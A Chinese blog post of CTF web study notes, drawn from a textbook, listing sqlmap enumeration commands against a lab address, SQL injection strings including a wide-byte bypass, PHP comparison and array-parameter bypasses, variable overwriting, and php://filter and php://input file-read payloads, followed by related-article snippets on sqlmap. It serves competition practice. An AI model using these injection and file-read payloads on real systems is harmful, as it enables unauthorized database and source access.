CTF_Web_SQL注入常用命令

最新推荐文章于 2024-05-13 18:57:47 发布
最新推荐文章于 2024-05-13 18:57:47 发布
阅读量700 收藏 16
点赞数 23
文章标签: 前端 sql 数据库 http 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_69026383/article/details/137169501
版权

CTF_Web_SQL注入常用命令

本人周日参加比赛,临时抱佛脚把书上涉及到的内容进行简单的收录整理。

SQL注入

http://1.1.1.1:8000/sqli/Less-1/index.php?id=1

http://1.1.1.1:8000/sqli/Less-1/index.php?id=1'

kali中

sqlmap -u "http://1.1.1.1:8000/sqli/Less-1/index.php?id=1" --current-db

--current-db判断当前数据库名称

-D 数据库名称 --tables 判断数据库中数据表名称

-D 数据库名称 -T 数据表名称 --columns 判断表中字段名称

D 数据库名称 -T 数据表名称 -C 字段名称 --dump 将字段值抓出来

打开登陆界面,尝试输入'or 1=1,得到报错提示。

you have an error in your sql syntax;check the manual that corresponds to your MySQL server version for the right sysntax to use near "and password=123" at line 1

说明后台sql语句中对于参数的引用使用了单引号。输入admin' or 1=1#,密码随意。

继续注入,输入admin'order by 3返回正确页面,输入admin'order by 4会报错,可知该数据库表中有三列。接下来判断数据库名称、表中名称、字段名称和flag值

登录页面→输入账户admin,密码随意,提示登录失败→输入admin'or 1=1#,密码随意,获得报错反馈→check the manual that corresponds to your MySQL server versionfor the right syntax to use near '1=1#' and password='111' at line 1→输入的or字符被过滤了,#没有被过滤。→使用admin' #注入

打开题目发现是一张图片,通过查看源代码、御剑工具扫描没有发现备份日志文件存在→将图片保存本地,在kali中使用binwalk进行分析

~/Desktop# binwalk xxx.bmp(xxx.bmp为图片名称)

→通过分析可以看到该BMP格式图片由一个压缩文件改成,将其拓展名改为.zip→打开需要密码,可以使用WinRAR修复后,ARCHPR进行破解→成功破解打开文件,提示内容要求输入账户密码

http://1.1.1.1:8000/web/web24/index.php?username=admin&password=123

用户名后加上%df'测试→%df被合并→此题有关宽字节注入→根据报错提示

http://1.1.1.1:8000/web/web24/index.php?username=admin&password=123%df' or 1%23

输入上述参数可绕过过滤限制得到flag结果

代码审计

★md5()函数的漏洞

PHP在处理哈希字符串时会利用!=或==对哈希值进行比较,它把每一个以0E开头的哈希值都解释为0,如果两个不同的变量经过哈希后,其值都是以0E开头,那么PHP将认为他们是相同的(都是0)

★shal函数的特性

通过源代码,并根据提示找到备份文件index.php查看代码→要求name和password两个参数值本身不相等,却要求经过shal()函数处理后的值相等。→可以构造两个参数都是数组类型的变量值代入以改变参数的类型是的函数在处理数组对象时报错,由于对于两个不同的数组处理后的结果肯定是一样的,因为可达到绕过的目的。

完整的绕过参数如下:

name[]=1&password[]=2

★PHP中科学计数法的表示

★有关php序列化和反序列化的基本知识

序列化过程即把数据转换为可存储或传输的形式,而反序列过程意思是转换成当初的数据对象。

Php的封装协议→php://input可以得到原始的pos的数据。

user=php=://input&file=class.php&pass=1

并在post data框中提交the users admin进行访问。

php://filter/convert.base64-encode/resource =index.php

这里把读取的内容转化为base64格式。

完整参数如下

user=php://input&file=php://filter/convert.base64-encode/resource =class.php&pass=1

★strcmp()函数的语法缺陷

根据源代码可以发现最后pass word参数和题目最后的flag变量,如果比较的结果等于零,则返回最后的flag值,该函数在比较字符串类型和数组类型时返回的结果直接是0,因此在此环境下,我们已经知道,最后的flag值肯定是字符串,只需要将才传入的参数pass word构造成数字的形式即可。

password[]=1

★变量覆盖基本原理

对题目进行扫描,可以发现是否存在备份文件。

根据代码提示,我们要绕过转移就应该为user name赋予反斜杠

在bp中改为

username=/&password=||1#&_CONFIG=1&Submit=.....

★有关文件包含的知识

在输入框中输入字符报错信息提示error file or error method,这说明在输入框中提交的数据方法和参数都不对,我们利用浏览器的Hack Bar插件提交post数据。→系统还是报错,说明错误,应该用php://filter 或php://input

在post data框输入

file=php://filter/read=convert.base64-encode/resource =index.php&....

文章内容参考清华大学出版的《CTF安全竞赛入门》(启明星辰网络空间安全学院主编)

Yulia...
关注
  • 23
    点赞
  • 16
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
mysql注入ctf_CTF SQL注入
weixin_42510026的博客
01-28 658
一、宽字节注入原理:GBK编码、URL转码利用mysql的一个特性,mysql在使用GBK编码的时候,会认为两个字符是一个汉字(前一个ASCII码要大于128,才到汉字的范围)例如:' -> ' -> %5C%27%df' -> %df' -> %df%5C%27sql字符集特性MYSQL 中 utf8_unicode_ci 和 utf8_general...
CTF-WEB总结之SQL注入
weixin_41038905的博客
05-01 711
简介 SQL注入漏洞的原理是由于开发者在编写操作数据库代码时,直接将外部可控的参数拼接到SQL语句中,没有经过任何过滤或过滤不严谨,导致攻击者可以使恶意语句在数据库引擎中执行。 Union注入 利用内置函数爆数据库信息及相关信息 version() database() user() current_user() @@datadir数据库路径 @@basedir mysql安装路径 @@ver...
红队笔记7-CTF4打靶流程-sqlmap注入-ssh远程登录
qq_63442530的博客
03-20 1400
CTF4这个靶场很简单,也是因为是09年的靶场了,sqlmap这种工具也没有诞生。思路:80端口->web->注入点->sqlmap获取账号密码->ssh登录打这个靶场也暴露出来我很多的缺点:1.在对web功能简单分析的过程中,老是被没有用的点浪费时间,对功能是否有利用点,分析的不到位,说到底还是自己的经验不足。2.过于依赖工具。红队笔记大佬还提到,进行渗透测试的过程中,我们不能单纯依赖nmap和sqlmap这种自动化工具,还是要了解漏洞的原理与代码的编写,使用工具表面上方便,但会有很多缺点。
6-2CTF夺旗入门教程--SQL注入POST参数-注入HTTP报文
高冷的宅先生
04-06 706
1.信息探测 #扫描主机开放的全部端口 nmap -T4 -p- 192.168.2.117 #扫描靶场全部信息 nmap -T4 -A -v 192.168.2.117 #探测敏感信息 nikto -host http:// dirb http:// #漏洞扫描 owasp 2.漏洞利用 登录界面 #burpsuite抓包,需要把浏览器设置代理 #在登录界面尝试登录,抓取请求数据包,保存为r...
CTFWeb各种题目的解题姿势
05-25
Web题型是CTF中常考题型之一,它将实际渗透过程中的技术技巧转化为CTF赛题,主要考察选手在Web渗透技术方面的能力,由于Web渗透涉及的知识点较多,知识面比较广泛,因此系统的总结和练习Web类题,是快速掌握出题人思路的一种有效的方法。
CTFHUB|SQL注入sqlmap
m0_60651303的博客
07-14 1222
差不多学了4天的SQL手工注入,学习一下sqlmap的使用,用工具偷偷懒。但等级越高,其速度越慢。一定要在时间内跑出来,要不然过期了就跑不出来了。1、顾名思义,要拿到cookie值。2、需要设置level至少为2。UA注入用--level 3。2、找数据库里面的表。4、爆破列里面的内容。过程中都会有五个选择。
CTF-web 第十二部分 sqlmap专题
iamsongyu的博客
11-25 2448
  sqlmap开源又功能强大的工具,支持现在几乎所有的数据库,比国内的任何工具都强。支持get,post ,cookie注入。可以添加cookie和user-agent 支持盲注,错误回显注入,还有其他多种注入方法。 支持代理, 优化算法,更高效, 指纹识别技术判断数据库。   当给sqlmap这么一个url (http://192.168.136.131/sqlmap/mysql/get_...
一套简单的ctf_web源码环境.zip
10-02
Web类的挑战通常涉及Web应用的安全漏洞,如SQL注入、XSS攻击、文件包含漏洞等。 【描述】:“一套简单的ctf_web源码环境”意味着这个压缩包内包含了一组基础的Web应用程序源代码,用于模拟CTF赛事中的Web题目。这些...
CTFHUB-web-SQL注入
ookami6497的博客
11-29 800
CTFHUB SQL
ctf.show web 8 sql注入过滤了‘
m0_46412682的博客
07-14 948
ctf.show web 8 sql注入过滤了’ 开始的页面 提示是sql注入,第一步先试下 ’ or 1=1# 提示sql注入错误 第二步试下/**/替代空格,还是错误 第三步,去掉’单引号,成功,说明过滤了单引号 查看有多少字段,1/**/or/**/1=1/**/union/**/select/**/1,2,3#,但是这里又提示sql错误,这里可能过滤了select和union关键字 上脚本,这的脚本是网上找的 import requests s=requests.session() url='h
SQLMAP解决sql注入CTF题目
sleepywin的博客
03-23 414
sqlmap解决sql注入
[网络安全自学篇] 二十七.Sqlmap基础用法、CTF实战及请求参数设置(一)
Azreal的博客
07-09 1684
一.Sqlmap介绍 Sqlmap 是一个开源的渗透测试工具,它可以自动化检测和利用SQL注入缺陷以及接管数据库服务器的过程。它配备了一个强大的检测引擎,由Python语言开发完成,通过外部连接访问数据库底层文件系统和操作系统,并执行命令实现渗透。许多适合于终极渗透测试的小众特性和广泛的开发,从数据库指纹、从数据库获取数据到访问底层文件系统和通过带外连接在操作系统上执行命令。 Sqlmap下载 可以从官方网址、Github或Python调用PIP命令实现。 官方网址:http://sqlmap.org.
渗透测试:详解sqlmap进行POST注入、基于insert的注入(以vulnhub靶机LampSecurity:CTF7为例)
Bossfrank的博客
06-22 4765
本文以vulnhub靶机LampSecurity:CTF7为例,详解了insert(非select)类型的SQL注入方法,包含对报错注入函数updatexml的使用。同时还详解了使用sqlmap进行POST类型注入的方法。
sqlmap tamper脚本_CTF小白入门- Sqlmap 安装及使用
weixin_39537049的博客
11-26 336
Sqlmap 简介及安装Sqlmap 是开源的可以自动检测并利用sql漏洞的渗透测试工具。CTF题目中经常遇到 sql注入题目,如果题目比较简单可以直接通过Sqlmap 拿到flag。Sqlmap 是基于python开发的工具。如果在Linux 系统中使用Sqlmap 直接下载源码安装即可。如果要在Windows系统中使用Sqlmap ,需要先安装python环境。http://sqlmap.or...
CTF刷题--SQL注入sqlmap
weixin_43882862的博客
08-13 2411
靶场第一题,解法2,使用sqlmap 解题思路(在kali下操作) 1、检测是否有sql注入漏洞 检测出来有id sqlmap -u http://59.63.200.79:8003/?id=1 2、获取当前用户 sqlmap -u http://59.63.200.79:8003/?id=1 --current-user 3、获取当前数据库 sqlmap -u http://59.63.200.79:8003/?id=1 --current-db 4、获取所有数据库 sqlmap -u http:/
sqlmap使用:ctfhub靶场查询SQL注入+查询Cookie注入+查询UA注入+Refer注入
NSQ0207的博客
07-20 561
CTFHub靶场+cookie注入+查询UA注入+Refer注入
sqlmap使用基本方法和具体操作流程(CTFHub演练)
最新发布
2302_80097039的博客
05-13 903
先简单了解一些相关知识对url爆破:sqlmap -u url #判断注入点sqlmap -u url --current-dbs #查看当前所有数据库sqlmap -u url --current-db #查看当前数据库sqlmap -u url -D 库名 --tables #爆表sqlmap -u url -D 库名 -T 表名 --columns #爆字段sqlmap -u url -D 库名 -T 表名 --C 字段名1,字段名2 --dump #爆数据。
攻防_漏洞_SQL注入_SQLmap使用
redglare的博客
12-01 494
SQLMap是⼀个开源的渗透测试⼯具,可以⾃动检测和利⽤SQL注⼊漏洞以及接⼊该数据库的服务器。 它拥有⾮常强⼤的检测引擎,具有多种特性的渗透测试器、通过数据库指纹提取访问底层⽂件系统并 通过外带链接执⾏命令。 SQLmap的常⽤参数有 –all 获取所有内容 –help 获取帮助 –dbs 获取数据库列表 –table -D “数据库” 获取数据库中的表 –columns -D “数据库” -T “数据表” 获取指定表中的字段名 –dump -D “数据库” -T “数据表” -C 获取该字段的内容 .
【无标题】CTFSQLMAP
qq_51802152的博客
12-18 798
CTFSQLMAP
mysqlSQL注入CTF Web安全探索关键信息库
本文档主要探讨了MySQLSQL注入Web安全CTF(Capture The Flag,网络安全竞赛)中的重要性,结合了对系统库的深入解析以及常用指令的操作。首先,我们来了解一下MySQL的核心组成部分和它们的功能: 1. **...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值